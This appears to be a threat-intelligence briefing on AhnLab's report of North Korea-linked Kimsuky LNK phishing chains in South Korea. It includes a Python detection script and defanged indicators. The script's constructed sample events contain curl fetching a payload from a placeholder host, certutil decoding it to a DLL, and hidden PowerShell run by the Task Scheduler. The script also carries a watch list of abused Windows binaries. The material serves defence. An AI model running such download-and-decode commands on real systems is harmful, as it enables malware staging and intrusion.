AhnLab's May 2026 monthly report on advanced persistent threat (APT) activity in South Korea paints a familiar picture: almost every targeted attack the security firm caught last month began with a spear-phishing email (a lure crafted for a specific person) carrying a malicious Windows shortcut, or LNK, file. Open it, and a chain of hidden scripts quietly installs backdoors and information stealers, handing North Korea-linked operators remote control of the victim's computer.
AhnLab's ASEC team reports that LNK-based attacks made up the single largest share of the intrusions it tracked, with booby-trapped CHM help files a distant second. The tradecraft and indicators line up with Kimsuky, the prolific North Korean espionage group AhnLab tags in the report, which has spent years phishing South Korean government, academic, and defense targets.
How the attack works
The lures arrive disguised as resumes, invoices, or routine work documents. The LNK file hides PowerShell or CMD commands that reach out to attacker-controlled servers, often abusing legitimate platforms such as Google Drive and GitHub to stage later payloads, then download additional malware and register a Windows Task Scheduler job so the infection survives a reboot. AhnLab cataloged at least eight distinct chains. Some drop AutoIt-based malware, others load XenoRAT (a remote access trojan), and several use DLL side-loading to slip a backdoor into a trusted Windows process where security tools are less likely to spot it. One cluster leans on curl.exe and certutil.exe, both built into Windows, to fetch and decode payloads, a living-off-the-land approach that leaves fewer obvious traces.
The pattern echoes earlier Kimsuky operations we have covered, including an LNK to PowerShell espionage chain built for credential theft and keylogging against South Korean government targets.
What you should do
AhnLab urges users to verify senders before opening attachments, avoid files from unknown sources, keep operating systems and browsers fully patched, and treat unexpected LNK, CHM, and HTA files as hostile. Because these chains rely on legitimate Windows utilities, defenders should watch for unusual child processes spawned by the Task Scheduler and for curl, certutil, regsvr32, or mshta reaching out to the internet.
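The two hunting rules in the paragraph above, written out as an added example (not code from AhnLab or IntelFusions): it triages constructed process-creation events, flagging curl/certutil/regsvr32/mshta launched with a URL on the command line, and script hosts spawned directly by the Task Scheduler service. The event field names mirror Sysmon's Event ID 1 but are an assumption; the hostnames and paths in the samples are placeholders.

```python
import re
from typing import Dict, List

# Windows-native binaries the guidance above says to watch for reaching the internet.
LOLBINS = {"curl.exe", "certutil.exe", "regsvr32.exe", "mshta.exe"}
# Interpreters a scheduled task on a workstation rarely needs to launch directly.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path ('' if path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_scheduler_parent(event: Dict[str, str]) -> bool:
    """True if the parent is the Task Scheduler service host (svchost -s Schedule / taskeng)."""
    parent = basename(event.get("ParentImage", ""))
    parent_cmd = event.get("ParentCommandLine", "").lower()
    return parent == "taskeng.exe" or (parent == "svchost.exe" and "schedule" in parent_cmd)

def triage(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert string per matching rule; an empty list means nothing fired."""
    alerts = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        cmdline = ev.get("CommandLine", "")
        if image in LOLBINS and URL_RE.search(cmdline):
            alerts.append(f"lolbin-network: {image} -> {cmdline}")
        if is_scheduler_parent(ev) and image in SCRIPT_HOSTS:
            alerts.append(f"scheduler-child: {image} spawned by Task Scheduler -> {cmdline}")
    return alerts

# Constructed sample events (not from the report). Only the first and third should fire:
# certutil decoding a local file has no URL, and the Schedule svchost itself is benign.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe /c start",
     "CommandLine": r"curl.exe -s -o C:\Users\Public\u.dat http://stage.example.invalid/u.dat"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": "cmd.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\Public\u.dat C:\Users\Public\u.dll"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": "svchost.exe -k netsvcs -p -s Schedule",
     "CommandLine": r"powershell.exe -w hidden -f C:\Users\Public\run.ps1"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentCommandLine": "services.exe", "CommandLine": "svchost.exe -k netsvcs -p -s Schedule"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

In production the LOLBin rule should be joined to actual network events (Sysmon Event ID 3) rather than a URL regex, since payload URLs are frequently hidden in script files or environment variables rather than the command line.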
Indicators of compromise
Selected defanged indicators from AhnLab's report: staging and command-and-control hosts hxxp://newtech[.]dkcreatech[.]com:57877/, hxxps://aplore[.]kesug[.]com/riln[.]php, update[.]nstlog[.]store, and univercity[.]library[.]boxathome[.]net; sample hashes (MD5) 076a8a0ae0c7d6270070b297c8617e2e and 0896485da9a470d504fbaad570b16358.
Full technical detail and the complete indicator set are in AhnLab's original report.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.